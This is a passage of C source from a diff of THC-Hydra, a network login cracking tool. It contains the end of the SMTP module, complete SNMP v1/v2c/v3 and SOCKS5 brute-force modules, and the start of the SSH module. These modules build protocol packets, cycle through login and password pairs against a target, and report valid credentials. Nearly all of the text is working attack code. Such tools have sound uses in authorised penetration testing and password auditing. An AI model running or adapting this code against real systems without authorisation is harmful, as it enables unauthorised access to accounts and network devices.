hydra_report(stderr, "[ERROR] option to use TLS/SSL failed as it is not supported by the server\n");
} else
hydra_report(stderr, "[ERROR] option to use TLS/SSL failed as it is not supported by the server\n");
}
#endif
if (buf[0] != '2') {
if (hydra_send(sock, buffer2, strlen(buffer2), 0) < 0)
hydra_child_exit(2);
free(buf);
buf = smtp_read_server_capacity(sock);
if (buf == NULL)
hydra_child_exit(2);
}
if ((strstr(buf, "LOGIN") == NULL) && (strstr(buf, "NTLM") != NULL)) {
smtp_auth_mechanism = AUTH_NTLM;
}
#ifdef LIBOPENSSL
if ((strstr(buf, "LOGIN") == NULL) && (strstr(buf, "DIGEST-MD5") != NULL)) {
smtp_auth_mechanism = AUTH_DIGESTMD5;
}
if ((strstr(buf, "LOGIN") == NULL) && (strstr(buf, "CRAM-MD5") != NULL)) {
smtp_auth_mechanism = AUTH_CRAMMD5;
}
#endif
if ((strstr(buf, "LOGIN") == NULL) && (strstr(buf, "PLAIN") != NULL)) {
smtp_auth_mechanism = AUTH_PLAIN;
}
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
if (strstr(miscptr, "LOGIN"))
smtp_auth_mechanism = AUTH_LOGIN;
if (strstr(miscptr, "PLAIN"))
smtp_auth_mechanism = AUTH_PLAIN;
#ifdef LIBOPENSSL
if (strstr(miscptr, "CRAM-MD5"))
smtp_auth_mechanism = AUTH_CRAMMD5;
if (strstr(miscptr, "DIGEST-MD5"))
smtp_auth_mechanism = AUTH_DIGESTMD5;
#endif
if (strstr(miscptr, "NTLM"))
smtp_auth_mechanism = AUTH_NTLM;
}
if (verbose) {
switch (smtp_auth_mechanism) {
case AUTH_LOGIN:
hydra_report(stderr, "[VERBOSE] using SMTP LOGIN AUTH mechanism\n");
break;
case AUTH_PLAIN:
hydra_report(stderr, "[VERBOSE] using SMTP PLAIN AUTH mechanism\n");
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:
hydra_report(stderr, "[VERBOSE] using SMTP CRAM-MD5 AUTH mechanism\n");
break;
case AUTH_DIGESTMD5:
hydra_report(stderr, "[VERBOSE] using SMTP DIGEST-MD5 AUTH mechanism\n");
break;
#endif
case AUTH_NTLM:
hydra_report(stderr, "[VERBOSE] using SMTP NTLM AUTH mechanism\n");
break;
}
}
free(buf);
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_smtp(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0) {
sock = hydra_disconnect(sock);
}
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_smtp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

580
hydra-snmp.c Normal file
View file

@ -0,0 +1,580 @@
#include "hydra-mod.h"
#ifdef LIBOPENSSL
#include <openssl/hmac.h>
#include <openssl/md5.h>
#include <openssl/sha.h>
#include <openssl/des.h>
#include <openssl/aes.h>
#endif
extern int hydra_data_ready_timed(int socket, long sec, long usec);
extern char *HYDRA_EXIT;
extern int child_head_no;
char snmpv3buf[1024], *snmpv3info = NULL;
int snmpv3infolen = 0, snmpversion = 1, snmpread = 1, hashtype = 1, enctype = 0;
char snmpv3_init[] = { 0x30, 0x3e, 0x02, 0x01, 0x03, 0x30, 0x11, 0x02,
0x04, 0x08, 0x86, 0xdd, 0xf0, 0x02, 0x03, 0x00,
0xff, 0xe3, 0x04, 0x01, 0x04, 0x02, 0x01, 0x03,
0x04, 0x10, 0x30, 0x0e, 0x04, 0x00, 0x02, 0x01,
0x00, 0x02, 0x01, 0x00, 0x04, 0x00, 0x04, 0x00,
0x04, 0x00, 0x30, 0x14, 0x04, 0x00, 0x04, 0x00,
0xa0, 0x0e, 0x02, 0x04, 0x3f, 0x44, 0x5c, 0xbc,
0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x00
};
char snmpv3_get1[] = { 0x30, 0x77, 0x02, 0x01, 0x03, 0x30, 0x11, 0x02,
0x04, 0x08, 0x86, 0xdd, 0xef, 0x02, 0x03, 0x00,
0xff, 0xe3, 0x04, 0x01, 0x05, 0x02, 0x01, 0x03
};
char snmpv3_get2[] = { 0x30, 0x2e, 0x04, 0x0c, 0x80, 0x00, 0x00,
0x09, 0x03, 0x00, 0x00, 0x1f, 0xca, 0x8d, 0x82,
0x1b, 0x04, 0x00, 0xa0, 0x1c, 0x02, 0x04, 0x3f,
0x44, 0x5c, 0xbb, 0x02, 0x01, 0x00, 0x02, 0x01,
0x00, 0x30, 0x0e, 0x30, 0x0c, 0x06, 0x08, 0x2b,
0x06, 0x01, 0x02, 0x01, 0x01, 0x01, 0x00, 0x05,
0x00
};
char snmpv3_nouser[] = { 0x04, 0x00, 0x04, 0x00, 0x04, 0x00 };
struct SNMPV1_A {
char ID;
char len;
char ver[3];
char comid;
char comlen;
};
struct SNMPV1_A snmpv1_a = {
.ID = '\x30',
.len = '\x00',
.ver = "\x02\x01\x00", /* \x02\x01\x01 for snmpv2c, \x02\x01\x03 for snmpv3 */
.comid = '\x04',
.comlen = '\x00'
};
struct SNMPV1_R {
char type[2];
char identid[2];
char ident[4];
char errstat[3];
char errind[3];
char objectid[2];
char object[11];
char value[3];
} snmpv1_r = {
.type = "\xa0\x1b", /* GET */
.identid = "\x02\x04",.ident = "\x1a\x5e\x97\x00", /* random crap :) */
.errstat = "\x02\x01\x00", /* no error */
.errind = "\x02\x01\x00", /* error index 0 */
.objectid = "\x30\x0d",.object = "\x30\x0b\x06\x07\x2b\x06\x01\x02\x01\x01\x01", /* sysDescr */
.value = "\x05\x00" /* we just read, so value = 0 */
};
struct SNMPV1_W {
char type[2];
char identid[2];
char ident[4];
char errstat[3];
char errind[3];
char objectid[2];
char object[12];
char value[8];
} snmpv1_w = {
.type = "\xa3\x21", /* SET */
.identid = "\x02\x04",.ident = "\x1a\x5e\x97\x22", /* random crap :) */
.errstat = "\x02\x01\x00", /* no error */
.errind = "\x02\x01\x00", /* error index 0 */
.objectid = "\x30\x13", /* string */
.object = "\x30\x11\x06\x08\x2b\x06\x01\x02\x01\x01\x05\x00",.value = "\x04\x05Hydra" /* writing hydra :-) */
};
#ifdef LIBOPENSSL
void password_to_key_md5(u_char * password, /* IN */
u_int passwordlen, /* IN */
u_char * engineID, /* IN - pointer to snmpEngineID */
u_int engineLength, /* IN - length of snmpEngineID */
u_char * key) { /* OUT - pointer to caller 16-octet buffer */
MD5_CTX MD;
u_char *cp, password_buf[80], *mypass = password, bpass[17];
u_long password_index = 0, count = 0, i, mylen = passwordlen, myelen = engineLength;
if (mylen < 8) {
memset(bpass, 0, sizeof(bpass));
strcpy(bpass, password);
while (mylen < 8) {
strcat(bpass, password);
mylen += passwordlen;
}
mypass = bpass;
}
if (myelen > 32)
myelen = 32;
MD5_Init(&MD); /* initialize MD5 */
/* Use while loop until we've done 1 Megabyte */
while (count < 1048576) {
cp = password_buf;
for (i = 0; i < 64; i++) {
/* Take the next octet of the password, wrapping */
/* to the beginning of the password as necessary. */
*cp++ = mypass[password_index++ % mylen];
}
MD5_Update(&MD, password_buf, 64);
count += 64;
}
MD5_Final(key, &MD); /* tell MD5 we're done */
/* Now localize the key with the engineID and pass */
/* through MD5 to produce final key */
/* May want to ensure that engineLength <= 32, */
/* otherwise need to use a buffer larger than 64 */
memcpy(password_buf, key, 16);
memcpy(password_buf + 16, engineID, myelen);
memcpy(password_buf + 16 + myelen, key, 16);
MD5_Init(&MD);
MD5_Update(&MD, password_buf, 32 + myelen);
MD5_Final(key, &MD);
return;
}
void password_to_key_sha(u_char * password, /* IN */
u_int passwordlen, /* IN */
u_char * engineID, /* IN - pointer to snmpEngineID */
u_int engineLength, /* IN - length of snmpEngineID */
u_char * key) { /* OUT - pointer to caller 20-octet buffer */
SHA_CTX SH;
u_char *cp, password_buf[80], *mypass = password, bpass[17];
u_long password_index = 0, count = 0, i, mylen = passwordlen, myelen = engineLength;
if (mylen < 8) {
memset(bpass, 0, sizeof(bpass));
strcpy(bpass, password);
while (mylen < 8) {
strcat(bpass, password);
mylen += passwordlen;
}
mypass = bpass;
}
if (myelen > 32)
myelen = 32;
SHA1_Init(&SH); /* initialize SHA */
/* Use while loop until we've done 1 Megabyte */
while (count < 1048576) {
cp = password_buf;
for (i = 0; i < 64; i++) {
/* Take the next octet of the password, wrapping */
/* to the beginning of the password as necessary. */
*cp++ = mypass[password_index++ % mylen];
}
SHA1_Update(&SH, password_buf, 64);
count += 64;
}
SHA1_Final(key, &SH); /* tell SHA we're done */
/* Now localize the key with the engineID and pass */
/* through SHA to produce final key */
/* May want to ensure that engineLength <= 32, */
/* otherwise need to use a buffer larger than 72 */
memcpy(password_buf, key, 20);
memcpy(password_buf + 20, engineID, myelen);
memcpy(password_buf + 20 + myelen, key, 20);
SHA1_Init(&SH);
SHA1_Update(&SH, password_buf, 40 + myelen);
SHA1_Final(key, &SH);
return;
}
#endif
int start_snmp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "\"\"", *ptr, *login, *pass, buffer[1024], buf[1024], hash[64], key[256], salt[8];
int i, j, k, size, off = 0, off2 = 0, done = 0;
unsigned char initVect[8], privacy_params[8];
int engine_boots = 0;
#ifdef LIBOPENSSL
DES_key_schedule symcbc;
#endif
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
if (snmpversion < 3) {
/* do we attack snmp v1 or v2c? */
if (snmpversion == 2) {
snmpv1_a.ver[2] = '\x01';
}
if (snmpread) {
size = sizeof(snmpv1_r);
} else {
size = sizeof(snmpv1_w);
}
snmpv1_a.comlen = (char) strlen(pass);
snmpv1_a.len = snmpv1_a.comlen + size + sizeof(snmpv1_a) - 3;
i = sizeof(snmpv1_a);
memcpy(buffer, &snmpv1_a, i);
strcpy(buffer + i, pass);
i += strlen(pass);
if (snmpread) {
memcpy(buffer + i, &snmpv1_r, size);
i += sizeof(snmpv1_r);
} else {
memcpy(buffer + i, &snmpv1_w, size);
i += sizeof(snmpv1_w);
}
} else { // snmpv3
if (enctype == 0) {
memcpy(buffer, snmpv3_get1, sizeof(snmpv3_get1));
i = sizeof(snmpv3_get1);
} else {
memcpy(buffer + 1, snmpv3_get1, sizeof(snmpv3_get1));
buffer[0] = buffer[1];
memset(buffer + 1, 0x81, 2);
i = sizeof(snmpv3_get1) + 1;
off2 = 1;
}
memcpy(buffer + i, snmpv3info, snmpv3infolen);
if (hashtype > 0) {
off = 12;
#ifdef LIBOPENSSL
if (hashtype == 1) {
password_to_key_md5(pass, strlen(pass), snmpv3info + 6, snmpv3info[5], key);
} else {
password_to_key_sha(pass, strlen(pass), snmpv3info + 6, snmpv3info[5], key);
}
#endif
if (enctype > 0) {
off += 8;
buffer[20 + off2] = 7;
}
} else {
ptr = login;
login = pass;
pass = ptr;
buffer[20] = 4;
}
buffer[i + 1] = 4 + snmpv3infolen + off + strlen(login);
buffer[i + 3] = 2 + snmpv3infolen + off + strlen(login);
if (enctype == 0)
buffer[1] = 48 + sizeof(snmpv3_get1) + buffer[i + 1];
i += snmpv3infolen;
//printf("2 + %d + %d + %d = 0x%02x\n", off, snmpv3infolen, strlen(login), buffer[1]);
buffer[i] = 0x04;
buffer[i + 1] = strlen(login);
memcpy(buffer + i + 2, login, strlen(login));
i += 2 + strlen(login);
buffer[i] = 0x04;
if (hashtype > 0) {
buffer[i + 1] = 12;
memset(buffer + i + 2, 0, 12);
off = i + 2;
i += 2 + 12;
} else {
buffer[i + 1] = 0;
i += 2;
}
buffer[i] = 0x04;
if (enctype == 0) {
buffer[i + 1] = 0x00;
i += 2;
} else {
buffer[i + 1] = 8;
memcpy(buffer + i + 2, salt, 8); // uninitialized and we dont care
i += 10;
}
if (enctype == 0) {
memcpy(buffer + i, snmpv3_get2, sizeof(snmpv3_get2));
i += sizeof(snmpv3_get2);
} else {
buffer[i] = 4;
buffer[i + 1] = 0x30;
#ifdef LIBOPENSSL
/*
//PrivDES::encrypt(const unsigned char *key,
// const unsigned int /*key_len*///,
// const unsigned char *buffer,
// const unsigned int buffer_len,
// unsigned char *out_buffer,
// unsigned int *out_buffer_len,
// unsigned char *privacy_params,
// unsigned int *privacy_params_len,
// const unsigned long engine_boots,
// const unsigned long /*engine_time*/)
// last 8 bytes of key are used as base for initialization vector */
k = 0;
memcpy((char *) initVect, key + 8, 8);
// put salt in privacy_params
j = htonl(engine_boots);
memcpy(privacy_params, (char *) &j, 4);
memcpy(privacy_params + 4, salt, 4); // ??? correct?
// xor initVect with salt
for (i = 0; i < 8; i++)
initVect[i] ^= privacy_params[i];
des_key_sched((C_Block *) key, symcbc);
des_ncbc_encrypt(snmpv3_get2 + 2, buf, sizeof(snmpv3_get2) - 2, symcbc, (C_Block *) (initVect), DES_ENCRYPT);
#endif
/* for (i = 0; i <= sizeof(snmpv3_get2) - 8; i += 8) {
des_ncbc_encrypt(snmpv3_get2 + i, buf + i, 8, (C_Block*)(initVect), DES_ENCRYPT);
}
// last part of buffer
if (buffer_len % 8) {
unsigned char tmp_buf[8];
unsigned char *tmp_buf_ptr = tmp_buf;
int start = buffer_len - (buffer_len % 8);
memset(tmp_buf, 0, 8);
for (unsigned int l = start; l < buffer_len; l++)
*tmp_buf_ptr++ = buffer[l];
des_ncbc_encrypt(tmp_buf, buf + start, 1, symcbc, (C_Block*)(initVect), DES_ENCRYPT);
*out_buffer_len = buffer_len + 8 - (buffer_len % 8);
} else
*out_buffer_len = buffer_len;
*/
//dummy
k = ((sizeof(snmpv3_get2) - 2) / 8);
if ((sizeof(snmpv3_get2) - 2) % 8 != 0)
k++;
memcpy(buffer + i + 2, buf, k * 8);
i += k * 8 + 2;
}
i++; // just to conform with the snmpv1/2 code
#ifdef LIBOPENSSL
if (hashtype == 1) {
HMAC((EVP_MD *) EVP_md5(), key, 16, buffer, i - 1, hash, NULL);
memcpy(buffer + off, hash, 12);
} else if (hashtype == 2) {
HMAC((EVP_MD *) EVP_sha1(), key, 20, buffer, i - 1, hash, NULL);
memcpy(buffer + off, hash, 12);
}
#endif
}
j = 0;
do {
if (hydra_send(s, buffer, i - 1, 0) < 0)
return 3;
j++;
} while (hydra_data_ready_timed(s, 1, 0) <= 0 && j < 3);
if (hydra_data_ready_timed(s, 5, 0) > 0) {
i = hydra_recv(s, (char *) buf, sizeof(buf));
if (snmpversion < 3) {
/* stolen from ADMsnmp... :P */
for (j = 0; j < i; j++) {
if (buf[j] == '\x04') { /* community name */
for (j = j + buf[j + 1]; j + 2 < i; j++) {
if (buf[j] == '\xa2') { /* PDU Response */
for (; j + 2 < i; j++) {
if (buf[j] == '\x02') { /* ID */
for (j = j + (buf[j + 1]); j + 2 < i; j++) {
if (buf[j] == '\x02') {
if (buf[j + 1] == '\x01') { /* good ! */
hydra_report_found_host(port, ip, "snmp", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
}
}
}
}
}
}
}
}
} else { // snmpv3 reply
off = 0;
if (buf[0] == 0x30) {
if (buf[4] == 0x03 && buf[5] == 0x30)
off = 4;
if (buf[5] == 0x03 && buf[6] == 0x30)
off = 6;
if (buf[6] == 0x03 && buf[7] == 0x30)
off = 6;
}
if (off == 0)
return 3;
if (debug)
printf("[DEBUG] buf[%d + 15] %d\n", off, buf[off + 15]);
k = 3 + off + buf[2 + off];
if ((j = hydra_memsearch(buf + k, buf[k + 3], snmpv3_nouser, sizeof(snmpv3_nouser))) < 0)
if ((j = hydra_memsearch(buf + k, buf[k + 3], login, strlen(login))) >= 0) {
if (snmpv3info[j - 2] == 0x04)
j -= 2;
else
j = -1;
}
if (j >= 0) {
i = buf[k + 3] + 4;
if (i > sizeof(snmpv3info))
i = sizeof(snmpv3info);
memcpy(snmpv3info, buf + k, i);
snmpv3infolen = j;
if (debug)
hydra_dump_asciihex(snmpv3info, snmpv3infolen);
}
if ((buf[off + 15] & 1) == 1) {
if (hashtype == 0)
hydra_report_found_host(port, ip, "snmp3", fp);
else
hydra_report_found_host(port, ip, "snmp", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
} else if ((buf[off + 15] & 5) == 4 && hydra_memsearch(buf, i, snmpv3_nouser, sizeof(snmpv3_nouser)) >= 0) { // user does not exist
if (debug)
printf("[DEBUG] server reply indicates login %s does not\n", login);
hydra_completed_pair_skip();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
}
}
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_snmp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1, i = 0;
int myport = PORT_SNMP;
char *lptr;
if (miscptr != NULL) {
lptr = strtok(miscptr, ":");
while (lptr != NULL) {
if (strcasecmp(lptr, "1") == 0)
snmpversion = 1;
else if (strcasecmp(lptr, "2") == 0)
snmpversion = 2;
else if (strcasecmp(lptr, "3") == 0)
snmpversion = 3;
else if (strcasecmp(lptr, "PLAIN") == 0)
hashtype = 0;
else if (strcasecmp(lptr, "MD5") == 0)
hashtype = 1;
else if (strncasecmp(lptr, "R", 1) == 0)
snmpread = 1;
else if (strncasecmp(lptr, "W", 1) == 0)
snmpread = 0;
else if (strncasecmp(lptr, "SHA", 3) == 0)
hashtype = 2;
else if (strcasecmp(lptr, "DES") == 0)
enctype = 1;
else if (strcasecmp(lptr, "AES") == 0)
enctype = 2;
else {
fprintf(stderr, "[ERROR] unknown optional parameter: %s\n", lptr);
hydra_child_exit(2);
}
lptr = strtok(NULL, ":");
}
}
if (hashtype == 0)
enctype = 0;
if (port != 0)
myport = port;
sock = hydra_connect_udp(ip, myport);
port = myport;
if (debug)
printf("[DEBUG] snmpv%d, isread %d, hashtype %d, enctype %d\n", snmpversion, snmpread, hashtype, enctype);
hydra_register_socket(sp);
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, no socket available\n", (int) getpid());
hydra_child_exit(1);
}
if (snmpversion == 3) {
next_run = 0;
while (snmpv3info == NULL && next_run < 3) {
hydra_send(sock, snmpv3_init, sizeof(snmpv3_init), 0);
if (hydra_data_ready_timed(sock, 5, 0) > 0) {
if ((i = hydra_recv(sock, (char *) snmpv3buf, sizeof(snmpv3buf))) > 30) {
if (snmpv3buf[4] == 3 && snmpv3buf[5] == 0x30); {
snmpv3info = snmpv3buf + 7 + snmpv3buf[6];
snmpv3infolen = snmpv3info[3] + 4;
while (snmpv3info[snmpv3infolen - 2] == 4 && snmpv3info[snmpv3infolen - 1] == 0)
snmpv3infolen -= 2;
if (debug)
hydra_dump_asciihex(snmpv3info, snmpv3infolen);
if (snmpv3info[10] == 3 && child_head_no == 0)
printf("[INFO] Remote device MAC address is %02x:%02x:%02x:%02x:%02x:%02x\n", (unsigned char) snmpv3info[12], (unsigned char) snmpv3info[13],
(unsigned char) snmpv3info[14], (unsigned char) snmpv3info[15], (unsigned char) snmpv3info[16], (unsigned char) snmpv3info[12]);
}
}
}
next_run++;
}
if (snmpv3info == NULL || i < snmpv3info + snmpv3infolen - snmpv3buf) {
hydra_report(stderr, "No valid reply from snmp server, exiting!\n");
hydra_child_exit(2);
}
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
run = 3;
while (1) {
switch (run) {
case 1: /* connect and service init function */
next_run = start_snmp(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_snmp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

180
hydra-socks5.c Normal file
View file

@ -0,0 +1,180 @@
#include "hydra-mod.h"
/*
RFC: 1928
This module enable bruteforcing for socks5, only following types are supported:
0x00 "No Authentication Required"
0x02 "Username/Password"
*/
extern char *HYDRA_EXIT;
unsigned char *buf;
int fail_cnt;
int start_socks5(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[300];
int pport, fud = 0;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
memcpy(buffer, "\x05\x02\x00\x02", 4);
if (hydra_send(s, buffer, 4, 0) < 0) {
return 1;
}
if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL) {
fail_cnt++;
if (fail_cnt >= 10)
return 5;
return (1);
}
fail_cnt = 0;
if (buf[0] != 5) {
if (buf[0] == 4) {
hydra_report(stderr, "[ERROR] Sorry Socks4 / Socks4a ident is not supported\n");
} else {
hydra_report(stderr, "[ERROR] Socks5 protocol or service shutdown: %s\n", buf);
}
free(buf);
return (4);
}
if (buf[1] == 0 || buf[1] == 32) {
hydra_report(stderr, "[INFO] Socks5 server does NOT require any authentication!\n");
free(buf);
return (4);
}
if (buf[1] != 0x2) {
hydra_report(stderr, "[ERROR] Socks5 protocol or service shutdown: %s\n", buf);
free(buf);
return (4);
}
free(buf);
/* RFC 1929
For username/password authentication the client's authentication request is
field 1: version number, 1 byte (must be 0x01)
*/
snprintf(buffer, sizeof(buffer), "\x01%c%s%c%s", (char) strlen(login), login, (char) strlen(pass), pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL)
return (1);
if (buf[1] != 255) {
/* new: false positive check */
free(buf);
pport = htons(port);
if (ip[0] == 16) {
memcpy(buffer, "\x05\x01\x00\x04", 4);
memcpy(buffer + 4, &ip[1], 16);
memcpy(buffer + 20, &pport, 2);
hydra_send(s, buffer, 22, 0);
} else {
memcpy(buffer, "\x05\x01\x00\x01", 4);
memcpy(buffer + 4, &ip[1], 4);
memcpy(buffer + 8, &pport, 2);
hydra_send(s, buffer, 10, 0);
}
if ((buf = (unsigned char *) hydra_receive_line(s)) != NULL) {
if (buf[1] == 0 || buf[1] == 32) {
hydra_report_found_host(port, ip, "socks5", fp);
hydra_completed_pair_found();
fud = 1;
} else if (buf[1] != 2) {
hydra_report_found_host_msg(port, ip, "socks5", fp, "might be a false positive!");
}
}
}
if (buf != NULL)
free(buf);
if (fud == 0)
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
void service_socks5(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_SOCKS5, mysslport = PORT_SOCKS5_SSL;
hydra_register_socket(sp);
if (port != 0)
myport = port;
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_socks5(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 4: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
case 5: /* clean exit, server may blocking connections */
hydra_report(stderr, "[ERROR] Server may blocking connections\n");
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_socks5_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

198
hydra-ssh.c Normal file
View file

@ -0,0 +1,198 @@
/*
libssh is available at http://www.libssh.org
If you want support for ssh v1 protocol, you
have to add option -DWITH_SSH1=On in the cmake
*/
#include "hydra-mod.h"
#ifndef LIBSSH
void dummy_ssh() {
printf("\n");
}
#else
#include <libssh/libssh.h>
#if LIBSSH_VERSION_MAJOR == 0 && LIBSSH_VERSION_MINOR >= 4
ssh_session session = NULL;
extern char *HYDRA_EXIT;
int new_session = 1;
int start_ssh(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, keep_login[300];
int auth_state = 0, rc = 0, i = 0;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
if (new_session) {
if (session) {
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
}
session = ssh_new();
ssh_options_set(session, SSH_OPTIONS_PORT, &port);
ssh_options_set(session, SSH_OPTIONS_HOST, hydra_address2string(ip));
ssh_options_set(session, SSH_OPTIONS_USER, login);
ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "none");
ssh_options_set(session, SSH_OPTIONS_COMPRESSION_S_C, "none");
if (ssh_connect(session) != 0) {
//if the connection was drop, exit and let hydra main handle it
if (verbose)
hydra_report(stderr, "[ERROR] could not connect to target port %d\n", port);
return 3;
}
if ((rc = ssh_userauth_none(session, NULL)) == SSH_AUTH_ERROR) {
return 3;
} else if (rc == SSH_AUTH_SUCCESS) {
hydra_report_found_host(port, ip, "ssh", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
else
return 1;
}
} else
new_session = 1;
auth_state = ssh_auth_list(session);
if ((auth_state & SSH_AUTH_METHOD_PASSWORD) > 0) {
auth_state = ssh_userauth_password(session, NULL, pass);
} else if ((auth_state & SSH_AUTH_METHOD_INTERACTIVE) > 0) {
auth_state = ssh_userauth_kbdint(session, NULL, NULL);
while (auth_state == SSH_AUTH_INFO) {
rc = ssh_userauth_kbdint_getnprompts(session);
for (i = 0; i < rc; i++)
ssh_userauth_kbdint_setanswer(session, i, pass);
auth_state = ssh_userauth_kbdint(session, NULL, NULL);
}
} else {
return 4;
}
if (auth_state == SSH_AUTH_ERROR) {
new_session = 1;
return 1;
}
if (auth_state == SSH_AUTH_SUCCESS || auth_state == SSH_AUTH_PARTIAL) {
hydra_report_found_host(port, ip, "ssh", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
} else {
strncpy(keep_login, login, sizeof(keep_login) - 1);
keep_login[sizeof(keep_login) - 1] = '\0';
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
login = hydra_get_next_login();
if (strcmp(login, keep_login) == 0)
new_session = 0;
return 1;
}
/* not reached */
return 1;
}
void service_ssh(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
next_run = start_ssh(sock, ip, port, options, miscptr, fp);
break;
case 2:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
hydra_child_exit(0);
case 3:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
if (verbose)
fprintf(stderr, "[ERROR] ssh protocol error\n");
hydra_child_exit(2);
case 4:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
fprintf(stderr, "[ERROR] ssh target does not support password auth\n");
hydra_child_exit(2);
default:
ssh_disconnect(session);
ssh_finalize();
ssh_free(session);
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
#else
#error "You are not using v0.4.x. Download from http://www.libssh.org and add -DWITH_SSH1=On in cmake to enable SSH v1 support"
#endif
#endif
int service_ssh_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// 1 skip target without generating an error
// 2 skip target because of protocol problems
// 3 skip target because its unreachable
#ifdef LIBSSH
int rc, method;
ssh_session session = ssh_new();
if (verbose || debug)
printf("[INFO] Testing if password authentication is supported by ssh://%s:%d\n", hydra_address2string(ip), port);
ssh_options_set(session, SSH_OPTIONS_PORT, &port);
ssh_options_set(session, SSH_OPTIONS_HOST, hydra_address2string(ip));
ssh_options_set(session, SSH_OPTIONS_USER, "root");
